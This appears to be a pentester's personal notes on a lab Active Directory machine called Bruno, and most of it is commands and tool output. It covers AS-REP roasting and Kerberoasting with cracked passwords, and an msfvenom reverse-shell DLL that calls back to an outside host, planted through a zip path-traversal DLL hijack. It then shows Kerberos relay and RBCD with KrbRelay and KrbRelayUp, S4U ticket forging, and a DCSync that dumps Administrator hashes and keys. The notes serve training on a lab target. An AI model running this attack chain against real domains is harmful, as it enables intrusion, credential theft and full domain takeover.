Bruno

This is not a writeup, just my notes about the machine.

Operating System: Microsoft Windows Server 2022 Datacenter

Chain: False

Credentials

Username	Password	Method	Scope
svc_scan	Sunshine1	Asreproast	Domain User
svc_net	Sunshine1	Kerberoast	Domain User

✅ Valid Usernames (RID-Brute Forcing)

svc_net
svc_scan
employees
Chloe.Ball
Kayleigh.Patel
Donna.Harrison
Charles.Young
Graeme.Grant
Natalie.Anderson
Sam.Owen
Jeremy.Singh
Kieran.Day
Hugh.Young

🔑 Passwords list

Sunshine1

Information Gathering

Nmap Scan

# Nmap 7.94SVN scan initiated Wed Apr  9 09:14:56 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_bruno_tcp_allports -vvv 10.10.86.131
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      syn-ack ttl 127 Microsoft IIS httpd 10.0
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49682/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
56502/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56527/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56675/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Service Enumeration

FTP

Anonymous FTP login Allowed

❯ wget -m --no-passive ftp://anonymous:anonymous@10.10.86.131
❯ tree
.
└── ftp
    ├── app
    │   ├── changelog
    │   ├── SampleScanner.deps.json
    │   ├── SampleScanner.dll
    │   ├── SampleScanner.exe
    │   ├── SampleScanner.runtimeconfig.dev.json
    │   └── SampleScanner.runtimeconfig.json
    ├── benign
    │   └── test.exe
    ├── malicious
    └── queue

File: changelog
----------------------
Version 0.3
- integrated with dev site
- automation using svc_scan

Version 0.2
- additional functionality 

Version 0.1
- initial support for EICAR string

Possible User: svc_scan

DNS

• Not vulnerable to DNS Zone Transfer AXFR

SMB (enum4linux-ng)

Domain SID: S-1-5-21-1536375944-4286418366-3447278137

DNS domain: bruno.vl

FQDN: brunodc.bruno.vl

• Server allows null session

HTTP

• FFUF | VHost Enumeration | subdomains-top1million-110000.txt | 0 Results

• FFUF | Web Fuzzing | directory-list-2.3-medium.txt | root | 0 results

Kerberos enumeration

Performing Asreproasting Attack

Previously Found User: svc_scan

❯ impacket-GetNPUsers bruno.vl/ -no-pass -usersfile users.txt 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

$krb5asrep$23$svc_scan@BRUNO.VL:e2237e0df0d2d6f565f2623c0c1b6a5c$c6ae17f760a235338e410f775dc165dd264623bfeddd22494b312b5d4634ea2f70bd24aef2580f56ede1d44ed117000e3ae8eed1103b65768576072b86cd47996e5f6b8ce846beb59d28092f4028c2b779313d5d65dea874a4917f9107f04724869cc6a02616a635d1e636d3570c19aa24560ce2805cff7d727a3872ea60fc6cb7f54267e5c4d2997c1356ad500871ee22326059d0e3447d075592e5e76edac3df9133641f2db8a848b0ae86f489ab8b1704765ea7e218defbe043dad4304aae263e3af6563e3f92daa3891bf66bb916f9cf3b12bf75b698dac5c7f520b267be5ca05216

❯ hashcat -m 18200 svc_scan.asreproast /usr/share/wordlists/rockyou.txt

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5asrep$23$svc_scan@BRUNO.VL:e2237e0df<SNIF>5ca05216:Sunshine1

Performing Kerberoasting with valid credentials

❯ impacket-GetUserSPNs bruno.vl/svc_scan:'Sunshine1' -request -outputfile kerberoast.hashes 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName   Name      MemberOf  PasswordLastSet             LastLogon                   Delegation 
---------------------  --------  --------  --------------------------  --------------------------  ----------
NET/brunodc.bruno.vl   svc_net             2022-06-29 09:35:45.023707  2025-04-09 10:05:29.910962             
SCAN/brunodc.bruno.vl  svc_scan            2022-06-29 09:36:15.210348  2025-04-09 10:05:41.239671             

❯ hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5tgs$23$*svc_scan$BRUNO.VL$bruno.vl/svc_scan*$980<SNIF>5cf107ef4e1d728c1c3773d685a6:Sunshine1
$krb5tgs$23$*svc_net$BRUNO.VL$bruno.vl/svc_net*$5e2ca<SNIF>14511aaa0310c60cbce39fb25bf8:Sunshine1

Discovering a read and write directory

❯ nxc smb 10.10.86.131 -u 'svc_net' -p 'Sunshine1' --shares
SMB         10.10.86.131    445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB         10.10.86.131    445    BRUNODC          [+] bruno.vl\svc_net:Sunshine1 
SMB         10.10.86.131    445    BRUNODC          [*] Enumerated shares
SMB         10.10.86.131    445    BRUNODC          Share           Permissions     Remark
SMB         10.10.86.131    445    BRUNODC          -----           -----------     ------
SMB         10.10.86.131    445    BRUNODC          ADMIN$                          Remote Admin
SMB         10.10.86.131    445    BRUNODC          C$                              Default share
SMB         10.10.86.131    445    BRUNODC          CertEnroll      READ            Active Directory Certificate Services share
SMB         10.10.86.131    445    BRUNODC          IPC$            READ            Remote IPC
SMB         10.10.86.131    445    BRUNODC          NETLOGON        READ            Logon server share 
SMB         10.10.86.131    445    BRUNODC          queue           READ,WRITE      
SMB         10.10.86.131    445    BRUNODC          SYSVOL          READ            Logon server share 

Foothold via DLL hijacking

During the enumeration of SampleScanner.dll, the tester discovered that when SampleScanner.exe is running, it looks for .zip files within C:\samples\queue\. If any are found, it unzips the content and deletes the original .zip file.

#Code Analyzed with dnSpy
private static void Main(string[] args)
{
	string text = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EYCAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";
	text.Replace("EYCAR", "EICAR");
	byte[] bytes = Encoding.ASCII.GetBytes(text);
	string[] files = Directory.GetFiles("C:\\samples\\queue\\", "*", SearchOption.AllDirectories);
	int i = 0;
	while (i < files.Length)
	{
		string text2 = files[i];
		if (text2.EndsWith(".zip"))
		{
			using (ZipArchive zipArchive = ZipFile.OpenRead(text2))
			{
				foreach (ZipArchiveEntry zipArchiveEntry in zipArchive.Entries)
				{
					string text3 = Path.Combine("C:\\samples\\queue\\", zipArchiveEntry.FullName);
					zipArchiveEntry.ExtractToFile(text3);
				}
				File.Delete(text2);
				goto IL_010E;
			}
			goto IL_00B8;
		}
		goto IL_00B8;
		IL_010E:
		i++;
		continue;
		IL_00B8:
		if (Program.PatternAt(File.ReadAllBytes(text2), bytes).Any<int>())
		{
			File.Copy(text2, text2.Replace("queue", "malicious"), true);
			File.Delete(text2);
			goto IL_010E;
		}
		File.Copy(text2, text2.Replace("queue", "benign"), true);
		File.Delete(text2);
		goto IL_010E;
	}
}

Additionally, the application attempts to load hostfxr.dll from the current directory. This behavior can be abused for DLL Hijacking.

Procmon.exe Sysinternals

Attack Path

• A zip file containing a malicious hostfxr.dll named as ../app/hostfxr.dll.

• Upload the zip file into queue directory.

• When the application runs again it will try to load hostfxr.dll that subsequently send the reverse shell.

Crafting the malicious DLL

❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.5.48 LPORT=1234 -f dll > hostfxr.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes

Abusing ZIP Path Traversal

EvilArc - Alternative: python2.7 evilarc.py -p ../app hostfxr.dll -d 0

Double Checking for the name:

❯ unzip -l hostfxr.zip
Archive:  hostfxr.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
     9216  2025-04-09 08:41   ../app/hostfxr.dll
---------                     -------
     9216                     1 file

Uploading the file

❯ smbclient '\\bruno.vl\queue' -U "svc_net%Sunshine1"
smb: \> put hostfxr.zip
putting file hostfxr.zip as \hostfxr.zip (18.2 kb/s) (average 18.2 kb/s)

Obtaining a reverse shell through DLL Hijacking

Domain Compromise via Kerberos Relay Attack

Requirements:

1. LDAP signing not required on Domain Controller.

nxc ldap bruno.vl -u 'svc_net' -p 'Sunshine1' -M ldap-checker
SMB         10.10.110.194   445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP        10.10.110.194   389    BRUNODC          [+] bruno.vl\svc_net:Sunshine1 
LDAP-CHE... 10.10.110.194   389    BRUNODC          LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.110.194   389    BRUNODC          LDAPS Channel Binding is set to "NEVER"

1. Ability to add computer into the domain controller.

❯ nxc ldap bruno.vl -u 'svc_net' -p 'Sunshine1' -M maq
SMB         10.10.110.194   445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP        10.10.110.194   389    BRUNODC          [+] bruno.vl\svc_net:Sunshine1 
MAQ         10.10.110.194   389    BRUNODC          [*] Getting the MachineAccountQuota
MAQ         10.10.110.194   389    BRUNODC          MachineAccountQuota: 10

Checking Available Port

Tool: KrbRelay

PS C:\Temp> ./CheckPort.exe
./CheckPort.exe
[*] Looking for available ports..

[*] SYSTEM Is allowed through port 10246

Kerberos Relay Attack using KrbRelay

Adding a new malicious computer

PS C:\Temp> Import-Module .\Powermad.ps1
PS C:\Temp> New-MachineAccount -MachineAccount evilcomputer  -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)

Obtaining the malicious computer SID

PS C:\Temp> Get-ADComputer -Identity "evilcomputer" -Properties SID | Select-Object Name, SIDe
S-1-5-21-1536375944-4286418366-3447278137-1117

Performing KrbRelay attack to compromise domain

PS C:\Temp> .\KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-1117 -port 10246 -ssl -reset-password Administrator Password123!
.\KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-1117 -port 10246 -ssl -reset-password Administrator Password123!
[*] Relaying context: bruno.vl\BRUNODC$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Temp\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAACH5O6Z8JnFvEvV1Uw90Me0AnAAALQQ//+cDjQ9VjoEdiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing SYSTEM authentication
[*] Using CLSID: d99e6e74-fc88-11d0-b498-00a0c90312f3
[*] apReq: 608206d506092a864886f71201020201006e8206c4308206c0a003020105a10302010ea20703050020000000a382050761820503308204ffa003020105a10a1b084252554e4f2e564ca2233021a003020102a11a30181b046c6461701b106272756e6f64632e6272756e6f2e766ca38204c5308204c1a003020112a103020105a28204b3048204af4b6beb2b9110a73221b44a8a04d1c98f81060fb09e7d7375f568ee63e437449836d128ebdecda9175441c0104bd03ac865981d47822229c0d047f865aacd03437200e55d254a0c81997cc0e6d0d5a6decbe2f676959acac7749cf387f791312665e859efa406dd1485c9e1a45430632c7b824a433cccf8009f53c9221ef1499f6c9d032758aa2ae873ccaef3d6fa6bcefd8b1bd6f017266f95e7ae28caea501accfab7fb438abf56c04cf8ea91bddb84987dcbe1c9e65bc3362dbee0c7958225f811ea6a485f2e6d3d4188586afefbc62ab521c9e340ce7c35920a42c3e954dc56ea4260b1b3091857a23c4a9d94dc2b17b4f9952f5083c133ec07a127677a283f5dc5a209aea370dc95c2fe75e152d530c3f0392297dea7a1a10372c6c6e38282fca7840f0a68b9ddc05df735f5d697c4becc2811aafe8e3aeb8a13d64c343e3688bed232bf849bb3631c2347a75c0a36ba0bed960c58e2c392a8443fbef0be1ca0a13896b7bfbca90216aef3155e83598435e83223b16946d50c68f879ded01c7765fa0e5810567bf1f77264e53384ae0e514db0b64853f635f6200b927c342dc953ac601e7aae114b2cc2f576c722d0e7dccf03313857dfc63044a6cf737469f958e0cde77defb0ebf14a51fcb611522e4dedae098a781c1955b49585633ee2c00201475cfae0da6ecdb608f5476a3ad56b9d77ad1d1cb9bf824b46ffeac89f1c9e1cb3b4672ffd28013f26edc21e89b1b99de2809a909058ed7f24836281d303555b08e36848355a02aaf4b024aae74b62b3206b2cdd188e58f3ea4666b50268f479a9a98b394e61adc797a19982b053588726a0ce05fceae2e58c93a6de844c80aa11298a17d27022e0a0d890638fc377443eb1a94098bcfc6606c230fd75c84ca8ad93721236c352398573afb7a5260cc5fcd1d83845fc438c21ff3b38381caf3bcd26755700ff8d40ee0e426ccac0edb73adfbf3839c5bdaa21d045e171338b52a3a86a254962d6236ff1dc93d4301f91558dce0136ab41d00bdf857e54718d1d4c9af14d66db01a265e9554e111254ee5acbdc1ee046a4a923f940bcb35e63d779db4251191ae9104ae48943ae374c6a05edbeea2a038ef7e5dc0f135b72a53fef2f66b4b8b9f9ff40e574dac600b7d426ccc7771ee67c7c53b514906b3894a3ea374f583d1967bf90d6c5e0ed06ca49918107e49e1726744f54f634af60e05496544ef86b6e41a2535751a6d47ee4a2a518ca1f1654477f09fc3fec2e056b78610ca2f7985f2ef7e68891bbcaee0f6cb2220064c2c01116eb3b5ab742909bdf9428cb28d554b9b81fdbae065643f4615f2d71e28157d396b759d37929f8c6335836bb55f317f9d685da0c4798a478536594b7b81a6f88b66e4de6485431629bf2a34ef3a32977535e8f37bd25a374a1da44e949238d394aedde4d8d4efa025655df50f8ace37f0667aae8f2744670e35b5c7d765877f55d0155b205aa6220dd9565ae23a5a509f8494cd2860544f5e06daace8f8009dcfee02a7d9914a09c8c7ab8c4c76a2e10ec57c265e1370a2caf8be963a8e00379c0e2efd88c59848354ed3ec48e6ac9693753efbd30eb63ef78af5aa297839b25f316f78719c8e59259efc20a0a35e2bba5ea1d11b986b43609984792679078a76a6f5f60cc4e2c730eb7d01668d68d4e363a8ed4a482019e3082019aa003020112a28201910482018d84df0d677265e818b47d42add3b1ca523df1943f1f83d5f8f0d792ebfad1b573d1bb547bc28a4ed6a74874bec008bc7e61ba20b6935b4850ff53c8dae5bb1d05c6e2c18a16e12b23b5ef3660fddfdcba7e441188450685e5df169d4ec4ff685197871f001f3e20e713288d6b85048ee16a7b91ad68e6fa91762584ff6e997da9d12504e495c36585977e574b5c64d13f05552feceda4470f79bcc9896844375b2ce419271a908c283f220a10f01e7bb763b6c11cec313c3000e55c824cde4d6a2e0ade840d9f924f544ceadca7919606867f1aea8013d6132beffe9c6321085c0ca93bbaecfa5b655e8607e5c0cfa368c11b5ca049bab462226356b51aa986cbaff19f05648ed0c0c0cc63fadc9393989dc5d92c13f6e8e58045f5363bf1c1794e3ce577649febb16a90b927fd521b6de74e1ade9437727f44c0cc74acf74c11fe17dbf4e2adc623affd8f1bd6d7e6b1ae702b8662f5d1c9ed9e800e2c0fb25c9b83e512791861051a42c65258f76e15dedea42019ede636b28500513f6feb54bb34bb3bc47072600f10dddd25
[*] bind: 0
[*] ldap_get_option: LDAP_SASL_BIND_IN_PROGRESS
[*] apRep1: 6f8188308185a003020105a10302010fa2793077a003020112a270046e31d628dff7927d6603ec5a3a3caba593768cde4d889902613ea33be9a9402cc9232c38e1800ccc6935966ff3e01b4b04d86eb537b760f6e8841bcb32b59df79e2d3ef0ac9251eddbfdf6e862c37032e89c9995e2fc99457c09a704e107efb9f24c08adf0c881cf39c7d46eb4f2bb
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
[*] apRep2: 6f5b3059a003020105a10302010fa24d304ba003020112a24404428d489c77f6d3d090176a32eb12f9accf0a803233250cb385f37cd8cc81f603f6d5defd5b00e7bf8cf8db2b3cc6924d9f366953784b7ca208bf429060130c80c35b0b
[*] bind: 0
[*] ldap_get_option: LDAP_SUCCESS
[+] LDAP session established
[*] ldap_modify: LDAP_SUCCESS
[*] ldap_modify: LDAP_SUCCESS
PS C:\Temp> 

❯ evil-winrm -i bruno.vl -u 'Administrator' -p 'Password123!'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
bruno\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

Kerberos Relay Attack using KrbRelayUp (Linux path)

Performing Kerberos Relay attack with KrbRelayUp tool to compromise domain

PS C:\Temp> .\KrbRelayUp.exe full -m rbcd -c -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
.\KrbRelayUp.exe full -m rbcd -c -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
KrbRelayUp - Relaying you to SYSTEM


[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Computer account "KRBRELAYUP$" added with password "bD7/vJ7-tF7@kS1-"
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] RBCD rights added successfully
[+] TGT request successful!
[+] Building S4U2self 
[+] Using domain controller: brunodc.bruno.vl (fe80::9d1a:7ff2:c40b:9583%6)
[+] Sending S4U2self request to fe80::9d1a:7ff2:c40b:9583%6:88
[+] S4U2self success!
[+] Got a TGS for 'Administrator' to 'KRBRELAYUP$@BRUNO.VL'
[+] Impersonating user 'Administrator' to target SPN 'HOST/BRUNODC'
[+] Building S4U2proxy request for service: 'HOST/BRUNODC'
[+] Using domain controller: brunodc.bruno.vl (fe80::9d1a:7ff2:c40b:9583%6)
[+] Sending S4U2proxy request to domain controller fe80::9d1a:7ff2:c40b:9583%6:88
[+] S4U2proxy success!
[+] Importing ticket into a sacrificial process using CreateNetOnly
[+] Process         : 'C:\Temp\KrbRelayUp.exe krbscm --ServiceName "KrbSCM"' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 3552
[+] Ticket successfully imported!
[+] LUID            : 0xec39a
[+] System service should be started in background

Requesting the Service Ticket with s4u using impacket

❯ impacket-getST -impersonate 'administrator' bruno.vl/'KRBRELAYUP$':'bD7/vJ7-tF7@kS1-' -spn HOST/brunodc.bruno.vl -dc-ip 10.10.67.195 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@HOST_brunodc.bruno.vl@BRUNO.VL.ccache

Performing DCSync Attack to dump NTDS.dit

❯ KRB5CCNAME="administrator@HOST_brunodc.bruno.vl@BRUNO.VL.ccache" impacket-secretsdump -k -no-pass brunodc.bruno.vl -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13735c7d60b417421dc6130ac3e0bfd4:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8366d22e99c4e2f9b5c9a8bbf5b1b9ea6fd097f622048a3fdb29e95ca69d686f
Administrator:aes128-cts-hmac-sha1-96:882ed3f25c43d2e0519951e837a885d3
Administrator:des-cbc-md5:3e16a497806115b3
[*] Cleaning up... 

Kerberos Relay Attack using KrbRelayUp (Windows path)

Performing Kerberos Relay attack with KrbRelayUp tool to compromise domain

PS C:\Temp> .\KrbRelayUp.exe full -m rbcd -c -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
.\KrbRelayUp.exe full -m rbcd -c -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
KrbRelayUp - Relaying you to SYSTEM


[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Computer account "KRBRELAYUP$" added with password "bD7/vJ7-tF7@kS1-"
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] RBCD rights added successfully
[+] TGT request successful!
[+] Building S4U2self 
[+] Using domain controller: brunodc.bruno.vl (fe80::9d1a:7ff2:c40b:9583%6)
[+] Sending S4U2self request to fe80::9d1a:7ff2:c40b:9583%6:88
[+] S4U2self success!
[+] Got a TGS for 'Administrator' to 'KRBRELAYUP$@BRUNO.VL'
[+] Impersonating user 'Administrator' to target SPN 'HOST/BRUNODC'
[+] Building S4U2proxy request for service: 'HOST/BRUNODC'
[+] Using domain controller: brunodc.bruno.vl (fe80::9d1a:7ff2:c40b:9583%6)
[+] Sending S4U2proxy request to domain controller fe80::9d1a:7ff2:c40b:9583%6:88
[+] S4U2proxy success!
[+] Importing ticket into a sacrificial process using CreateNetOnly
[+] Process         : 'C:\Temp\KrbRelayUp.exe krbscm --ServiceName "KrbSCM"' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 3552
[+] Ticket successfully imported!
[+] LUID            : 0xec39a
[+] System service should be started in background

Requesting Ticket Granting Ticket for KRBRELAYUP$ user

PS C:\Temp> .\Rubeus.exe asktgt /user:'KRBRELAYUP$' /password:'bD7/vJ7-tF7@kS1-' /nowrap
.\Rubeus.exe asktgt /user:'KRBRELAYUP$' /password:'bD7/vJ7-tF7@kS1-' /nowrap

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 

[*] Action: Ask TGT

[*] Using rc4_hmac hash: ACFC0492669C004A8D08561ED4EF0DA3
[*] Building AS-REQ (w/ preauth) for: 'bruno.vl\KRBRELAYUP$'
[*] Using domain controller: fe80::9d1a:7ff2:c40b:9583%6:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFYDCCBVygAwIBBaEDAgEWooIEfjCCBHphggR2MIIEcqADAgEFoQobCEJSVU5PLlZMoh0wG6ADAgECoRQwEhsGa3JidGd0GwhicnVuby52bKOCBD4wggQ6oAMCARKhAwIBAqKCBCwEggQoriz9vNRC5Qs6ZVnWaXioQF4XktrqwMkzqhk7QgpH5JVT6h50nQrxXN1VwchmpTHu9bhII6OgmW+bGYySFws6YUq/Q6ED18QbsY1iEgsotXxtSAj2zml0tZ3gQmrPkgkw01dwW17heEmETPkJgLH91Dkv2vUccNbJF/8dEYUydN/6ux2SEpI2XkzihCzfOU8l9ck4gW5B76I6+MREh4YgV7+xSZ18d6hDMc4nYd4gND2Z1CrlhODM6GUFpjuA6pyI/rVEnk2HNSEk4FRRUSXuRAjeC1t86Fjfx9BLI3t2xetlzpI2C77Zrvu8ZnoQtHAn4nrEDBb5jZmAVqDbrUTKj7p8E/VXq8V8WeUQID9rhy/sfczpLMiA2kZRJRQnsj6MO4PKrmsXf20XFkB6fRuYZBP6Ik+2Bwq9O4x49dQvRd9dsWYsvRS0sge9JAIDDqx5i+zU0zXJrJnTiU6RGxuBpHSrO//vkXxxcwYFxM5kJfbzREAnmSedr4uzz6+QV/a8QhVN9W75KpTNt1z3OiK4ZzWdbwt4QemSJwUQwcLDxyUn9u3sD1TWBcreEcWtxswA/pOrOKOIS6YuDIcH3waWqm3uqeWrTDON1M5odFZYjdkvevLwsxk7wjRUiH34hwmcuWvf5YWkZB82TJioez+gt45WsukvD+5dW/dJNBe7OVd2cx2WfJhC0UC3KKV1xyDB7fkzt/2CftvcR1WCiDk0Q0j3Wxmjy115WEqopywMGj6e3JCQzd48F8ZADU0WYC1Y/HxJ+vogEAt03A4NFhZFGHSvzq3BzSjPtQxEJWsyPtW0byqLUHvRtjm0JNhD7ZvFiv+8TIX9bGDBzwSwGxcyAyZe0Bylj4wRPX1MPHqeS67DTJP0K9mnON1uAoTfLBitBaOu+XCFW2hWTNJxAJdreVl3QdcR0GnVWlq6xa9ct2kqgDUyNrD1qYqb7yAGrUwpEciswe7anOCwzehTsGPTuLqXf5E8VV46rQP7rOmlq+9NL0ktf/5JHwKuxXi/5xdC38DNAcupDeHAgfZ3/UdpcW3dPKITkhXu5eN9J8x1m4cLaCbsCuxCcsOUyx9ibqsaD8vUFvWHYCPKv9NIQV5XSNuxV4ntGUZo7tH6Ai1RcmgKbC1po6clEu9ZDgZ+1DjE58vna1tkqxglOxw+ix5zK5JoLw3OaWLGfvdZxUJZDY6JiskL8y1BMx7IBbRn6LAZH/PGn18YfifNJHDfT0noczNYocF7I7fmaWaAauT36YApm3Vci81f3zA+NTV44jlU4F/9R+K8RGQWiuZzIGVzPwrZBCAG+v6lu4iaxR6USo1MkKK8UirrCFcsRuyLg3SRYHGbnjevuPPrsEvlI009PUOE4y7HFaSM6FprPq7ibcJkLfiyhNOU420ZlCQTS3drLuBtZ4eEKpOjgc0wgcqgAwIBAKKBwgSBv32BvDCBuaCBtjCBszCBsKAbMBmgAwIBF6ESBBAP28err1/xCqlSZdUu8QM7oQobCEJSVU5PLlZMohgwFqADAgEBoQ8wDRsLS1JCUkVMQVlVUCSjBwMFAEDhAAClERgPMjAyNTA0MTEwMTMzMjJaphEYDzIwMjUwNDExMTEzMzIyWqcRGA8yMDI1MDQxODAxMzMyMlqoChsIQlJVTk8uVkypHTAboAMCAQKhFDASGwZrcmJ0Z3QbCGJydW5vLnZs

  ServiceName              :  krbtgt/bruno.vl
  ServiceRealm             :  BRUNO.VL
  UserName                 :  KRBRELAYUP$
  UserRealm                :  BRUNO.VL
  StartTime                :  4/11/2025 1:33:22 AM
  EndTime                  :  4/11/2025 11:33:22 AM
  RenewTill                :  4/18/2025 1:33:22 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  D9vHq69f8QqpUmXVLvEDOw==
  ASREP (key)              :  ACFC0492669C004A8D08561ED4EF0DA3

Requesting Ticket Granting Service using S4U

PS C:\Temp> .\Rubeus.exe s4u /ticket:doIFYDCCBVygAwIBBaEDAgEWooIE<>snip /impersonateuser:administrator /msdsspn:HOST/brunodc.bruno.vl /domain:bruno.vl /dc:brunodc.bruno.vl /nowrap /outfile:ticket.kirbi

Trying to perform DCSync attack using mimikatz

I tried to perform a DCSync attack within Windows using Mimikatz, but it didn’t work, even though the tickets were valid. On Windows, UAC (User Account Control) filters admin privileges for network operations (e.g., SMB, LDAP), causing Access Denied and Mimikatz failed because SeDebugPrivilege wasn’t enabled due to insufficient local privileges or restrictions. Additionally, tickets injected into the session via /ptt are subject to UAC and local ACLs, limiting their use. Then I decided to move to my Linux machine and perform the DCSync attack using Impacket. In Linux, it worked because Impacket uses the .ccache ticket directly against the DC, bypassing UAC and local privilege issues, and applies the ticket’s permissions cleanly over the network without session constraints.

PS C:\Temp> .\mimikatz.exe privilege::debug "lsadump::dcsync /all /path" exit
.\mimikatz.exe privilege::debug "lsadump::dcsync /all /path" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz(commandline) # lsadump::dcsync /all /path
[DC] 'bruno.vl' will be the domain
[DC] 'brunodc.bruno.vl' will be the DC server
[DC] Exporting domain 'bruno.vl'
[rpc] Service  : ldap
